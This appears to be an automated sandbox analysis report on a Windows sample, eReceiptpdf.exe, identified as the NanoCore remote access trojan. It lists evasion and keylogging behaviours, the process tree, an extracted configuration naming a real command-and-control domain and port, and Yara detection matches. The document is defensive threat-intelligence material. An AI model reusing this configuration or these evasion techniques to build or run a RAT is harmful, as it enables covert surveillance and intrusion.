Play interactive tour

Edit tour

Windows Analysis Report eReceiptpdf.exe

Overview

General Information

Sample Name:	eReceiptpdf.exe
Analysis ID:	509854
MD5:	c97f7f2dea671626ab1c6d3d1ad59422
SHA1:	de5bc22d6558a46f99784598f550a3affab19ada
SHA256:	9b65db8538653ab63132c23e45852d5455c9cc661655fa217b42a830b0efd24c
Tags:	exeNanoCoreRAT
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Detected Nanocore Rat

Multi AV Scanner detection for dropped file

Yara detected Nanocore RAT

Hides threads from debuggers

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses dynamic DNS services

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Drops PE files

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Launches processes in debugging mode, may be used to hinder debugging

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

eReceiptpdf.exe (PID: 7124 cmdline: 'C:\Users\user\Desktop\eReceiptpdf.exe' MD5: C97F7F2DEA671626AB1C6D3D1AD59422)

eReceiptpdf.exe (PID: 5784 cmdline: C:\Users\user\Desktop\eReceiptpdf.exe MD5: C97F7F2DEA671626AB1C6D3D1AD59422)

WerFault.exe (PID: 6360 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 7076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

dhcpmon.exe (PID: 6428 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: C97F7F2DEA671626AB1C6D3D1AD59422)

dhcpmon.exe (PID: 6564 cmdline: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe MD5: C97F7F2DEA671626AB1C6D3D1AD59422)

dhcpmon.exe (PID: 1308 cmdline: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe MD5: C97F7F2DEA671626AB1C6D3D1AD59422)

dhcpmon.exe (PID: 6048 cmdline: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe MD5: C97F7F2DEA671626AB1C6D3D1AD59422)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "d49cd953-2518-4f4a-81ab-2e5bbd26", "Group": "kings", "Domain1": "zeegod.duckdns.org", "Domain2": "", "Port": 8655, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
eReceiptpdf.exe	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x105ed:$x1: NanoCore.ClientPluginHost 0x1062a:$x2: IClientNetworkHost 0x1415d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10355:$a: NanoCore 0x10365:$a: NanoCore 0x10599:$a: NanoCore 0x105ad:$a: NanoCore 0x105ed:$a: NanoCore 0x103b4:$b: ClientPlugin 0x105b6:$b: ClientPlugin 0x105f6:$b: ClientPlugin 0x104db:$c: ProjectData 0x10ee2:$d: DESCrypto 0x188ae:$e: KeepAlive 0x1689c:$g: LogClientMessage 0x12a97:$i: get_Connected 0x11218:$j: #=q 0x11248:$j: #=q 0x11264:$j: #=q 0x11294:$j: #=q 0x112b0:$j: #=q 0x112cc:$j: #=q 0x112fc:$j: #=q 0x11318:$j: #=q
00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x47f4d:$a: NanoCore 0x47fa6:$a: NanoCore 0x47fe3:$a: NanoCore 0x4805c:$a: NanoCore 0x4d5f1:$a: NanoCore 0x4d63b:$a: NanoCore 0x4d825:$a: NanoCore 0x61144:$a: NanoCore 0x61159:$a: NanoCore 0x6118e:$a: NanoCore 0x79bfb:$a: NanoCore 0x79c10:$a: NanoCore 0x79c45:$a: NanoCore 0x47faf:$b: ClientPlugin 0x47fec:$b: ClientPlugin 0x488ea:$b: ClientPlugin 0x488f7:$b: ClientPlugin 0x4d38a:$b: ClientPlugin 0x4d5fa:$b: ClientPlugin 0x4d644:$b: ClientPlugin 0x60f00:$b: ClientPlugin
00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x105ed:$x1: NanoCore.ClientPluginHost 0x1062a:$x2: IClientNetworkHost 0x1415d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10355:$a: NanoCore 0x10365:$a: NanoCore 0x10599:$a: NanoCore 0x105ad:$a: NanoCore 0x105ed:$a: NanoCore 0x103b4:$b: ClientPlugin 0x105b6:$b: ClientPlugin 0x105f6:$b: ClientPlugin 0x104db:$c: ProjectData 0x10ee2:$d: DESCrypto 0x188ae:$e: KeepAlive 0x1689c:$g: LogClientMessage 0x12a97:$i: get_Connected 0x11218:$j: #=q 0x11248:$j: #=q 0x11264:$j: #=q 0x11294:$j: #=q 0x112b0:$j: #=q 0x112cc:$j: #=q 0x112fc:$j: #=q 0x11318:$j: #=q
00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4f7ba5:$x1: NanoCore.ClientPluginHost 0x4f7be2:$x2: IClientNetworkHost 0x4fb715:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4f790d:$a: NanoCore 0x4f791d:$a: NanoCore 0x4f7b51:$a: NanoCore 0x4f7b65:$a: NanoCore 0x4f7ba5:$a: NanoCore 0x4f796c:$b: ClientPlugin 0x4f7b6e:$b: ClientPlugin 0x4f7bae:$b: ClientPlugin 0x4f7a93:$c: ProjectData 0x4f849a:$d: DESCrypto 0x4ffe66:$e: KeepAlive 0x4fde54:$g: LogClientMessage 0x4fa04f:$i: get_Connected 0x4f87d0:$j: #=q 0x4f8800:$j: #=q 0x4f881c:$j: #=q 0x4f884c:$j: #=q 0x4f8868:$j: #=q 0x4f8884:$j: #=q 0x4f88b4:$j: #=q 0x4f88d0:$j: #=q
00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4f7ba5:$x1: NanoCore.ClientPluginHost 0x4f7be2:$x2: IClientNetworkHost 0x4fb715:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4f790d:$a: NanoCore 0x4f791d:$a: NanoCore 0x4f7b51:$a: NanoCore 0x4f7b65:$a: NanoCore 0x4f7ba5:$a: NanoCore 0x4f796c:$b: ClientPlugin 0x4f7b6e:$b: ClientPlugin 0x4f7bae:$b: ClientPlugin 0x4f7a93:$c: ProjectData 0x4f849a:$d: DESCrypto 0x4ffe66:$e: KeepAlive 0x4fde54:$g: LogClientMessage 0x4fa04f:$i: get_Connected 0x4f87d0:$j: #=q 0x4f8800:$j: #=q 0x4f881c:$j: #=q 0x4f884c:$j: #=q 0x4f8868:$j: #=q 0x4f8884:$j: #=q 0x4f88b4:$j: #=q 0x4f88d0:$j: #=q
00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4f7ba5:$x1: NanoCore.ClientPluginHost 0x4f7be2:$x2: IClientNetworkHost 0x4fb715:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4f790d:$a: NanoCore 0x4f791d:$a: NanoCore 0x4f7b51:$a: NanoCore 0x4f7b65:$a: NanoCore 0x4f7ba5:$a: NanoCore 0x4f796c:$b: ClientPlugin 0x4f7b6e:$b: ClientPlugin 0x4f7bae:$b: ClientPlugin 0x4f7a93:$c: ProjectData 0x4f849a:$d: DESCrypto 0x4ffe66:$e: KeepAlive 0x4fde54:$g: LogClientMessage 0x4fa04f:$i: get_Connected 0x4f87d0:$j: #=q 0x4f8800:$j: #=q 0x4f881c:$j: #=q 0x4f884c:$j: #=q 0x4f8868:$j: #=q 0x4f8884:$j: #=q 0x4f88b4:$j: #=q 0x4f88d0:$j: #=q
0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1031d:$x1: NanoCore.ClientPluginHost 0x1035a:$x2: IClientNetworkHost 0x13e8d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10085:$a: NanoCore 0x10095:$a: NanoCore 0x102c9:$a: NanoCore 0x102dd:$a: NanoCore 0x1031d:$a: NanoCore 0x100e4:$b: ClientPlugin 0x102e6:$b: ClientPlugin 0x10326:$b: ClientPlugin 0x1020b:$c: ProjectData 0x10c12:$d: DESCrypto 0x185de:$e: KeepAlive 0x165cc:$g: LogClientMessage 0x127c7:$i: get_Connected 0x10f48:$j: #=q 0x10f78:$j: #=q 0x10f94:$j: #=q 0x10fc4:$j: #=q 0x10fe0:$j: #=q 0x10ffc:$j: #=q 0x1102c:$j: #=q 0x11048:$j: #=q
00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x69437:$a: NanoCore 0x69490:$a: NanoCore 0x694cd:$a: NanoCore 0x69546:$a: NanoCore 0x6ecfe:$a: NanoCore 0x6ed48:$a: NanoCore 0x6ef32:$a: NanoCore 0x69499:$b: ClientPlugin 0x694d6:$b: ClientPlugin 0x69dd4:$b: ClientPlugin 0x69de1:$b: ClientPlugin 0x6ea97:$b: ClientPlugin 0x6ed07:$b: ClientPlugin 0x6ed51:$b: ClientPlugin 0x6f269:$c: ProjectData 0x5cabf:$e: KeepAlive 0x69921:$g: LogClientMessage 0x6f15c:$g: LogClientMessage 0x698a1:$i: get_Connected 0x5cb93:$j: #=q 0x5cbaf:$j: #=q
Process Memory Space: eReceiptpdf.exe PID: 7124	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x20a45:$x1: NanoCore.ClientPluginHost 0x20a82:$x2: IClientNetworkHost 0x23f96:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2ed10:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2bf856:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: eReceiptpdf.exe PID: 7124	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: eReceiptpdf.exe PID: 7124	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x20895:$a: NanoCore 0x208a5:$a: NanoCore 0x208f6:$a: NanoCore 0x20905:$a: NanoCore 0x209f1:$a: NanoCore 0x20a05:$a: NanoCore 0x20a45:$a: NanoCore 0x2b37a:$a: NanoCore 0x2b38c:$a: NanoCore 0x2b3c8:$a: NanoCore 0x2bbec0:$a: NanoCore 0x2bbed2:$a: NanoCore 0x2bbf0e:$a: NanoCore 0x208b9:$b: ClientPlugin 0x2094f:$b: ClientPlugin 0x20a0e:$b: ClientPlugin 0x20a4e:$b: ClientPlugin 0x2b395:$b: ClientPlugin 0x2b3d1:$b: ClientPlugin 0x2bbedb:$b: ClientPlugin 0x2bbf17:$b: ClientPlugin
Process Memory Space: dhcpmon.exe PID: 6428	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2974e2:$x1: NanoCore.ClientPluginHost 0x29751f:$x2: IClientNetworkHost 0x29aa3e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2a57c7:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xba423c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: dhcpmon.exe PID: 6428	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6428	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x297332:$a: NanoCore 0x297342:$a: NanoCore 0x297393:$a: NanoCore 0x2973a2:$a: NanoCore 0x29748e:$a: NanoCore 0x2974a2:$a: NanoCore 0x2974e2:$a: NanoCore 0x2a1e31:$a: NanoCore 0x2a1e43:$a: NanoCore 0x2a1e7f:$a: NanoCore 0xba08a6:$a: NanoCore 0xba08b8:$a: NanoCore 0xba08f4:$a: NanoCore 0x297356:$b: ClientPlugin 0x2973ec:$b: ClientPlugin 0x2974ab:$b: ClientPlugin 0x2974eb:$b: ClientPlugin 0x2a1e4c:$b: ClientPlugin 0x2a1e88:$b: ClientPlugin 0xba08c1:$b: ClientPlugin 0xba08fd:$b: ClientPlugin
Process Memory Space: dhcpmon.exe PID: 6048	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1224:$x1: NanoCore.ClientPluginHost 0x123e:$x2: IClientNetworkHost 0x2b993:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x36426:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: dhcpmon.exe PID: 6048	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6048	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x11cc:$a: NanoCore 0x11e7:$a: NanoCore 0x1224:$a: NanoCore 0x129d:$a: NanoCore 0x1617:$a: NanoCore 0x166a:$a: NanoCore 0x16a3:$a: NanoCore 0x1716:$a: NanoCore 0x239c:$a: NanoCore 0x275f:$a: NanoCore 0x27a5:$a: NanoCore 0x296c:$a: NanoCore 0x97c0:$a: NanoCore 0x97d3:$a: NanoCore 0x9805:$a: NanoCore 0xef41:$a: NanoCore 0xef54:$a: NanoCore 0xef86:$a: NanoCore 0x15ffd:$a: NanoCore 0x285f5:$a: NanoCore 0x2863b:$a: NanoCore
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.dhcpmon.exe.30f9658.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x42a6:$x1: NanoCore.ClientPluginHost
18.2.dhcpmon.exe.30f9658.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x42a6:$x2: NanoCore.ClientPluginHost 0x4384:$s4: PipeCreated 0x42c0:$s5: IClientLoggingHost
18.2.dhcpmon.exe.30f9658.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x66a6:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
18.2.dhcpmon.exe.30f9658.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x66a6:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x6784:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x66c0:$s5: IClientLoggingHost
18.2.dhcpmon.exe.30fe6b8.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1646:$x1: NanoCore.ClientPluginHost
18.2.dhcpmon.exe.30fe6b8.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1646:$x2: NanoCore.ClientPluginHost 0x1724:$s4: PipeCreated 0x1660:$s5: IClientLoggingHost
17.2.dhcpmon.exe.340000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
12.2.dhcpmon.exe.4f77190.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.dhcpmon.exe.4f77190.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.2.dhcpmon.exe.4f77190.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.dhcpmon.exe.4f77190.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
15.0.dhcpmon.exe.420000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
0.0.eReceiptpdf.exe.dc0000.1.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
0.0.eReceiptpdf.exe.5144460.25.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.0.eReceiptpdf.exe.5144460.25.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.0.eReceiptpdf.exe.5144460.25.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.0.eReceiptpdf.exe.5144460.25.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
17.0.dhcpmon.exe.340000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
0.0.eReceiptpdf.exe.dc0000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
0.2.eReceiptpdf.exe.dc0000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
18.2.dhcpmon.exe.40e016e.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4083:$x1: NanoCore.ClientPluginHost
18.2.dhcpmon.exe.40e016e.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4083:$x2: NanoCore.ClientPluginHost 0x4161:$s4: PipeCreated 0x409d:$s5: IClientLoggingHost
12.2.dhcpmon.exe.4f77190.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.dhcpmon.exe.4f77190.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.2.dhcpmon.exe.4f77190.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.dhcpmon.exe.4f77190.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
15.2.dhcpmon.exe.420000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
18.2.dhcpmon.exe.40ea9e1.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
18.2.dhcpmon.exe.40ea9e1.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
18.2.dhcpmon.exe.40ea9e1.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.dhcpmon.exe.40e016e.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x6483:$x1: NanoCore.ClientPluginHost 0x1a020:$x1: NanoCore.ClientPluginHost 0x32ad7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x1a04d:$x2: IClientNetworkHost 0x32b04:$x2: IClientNetworkHost
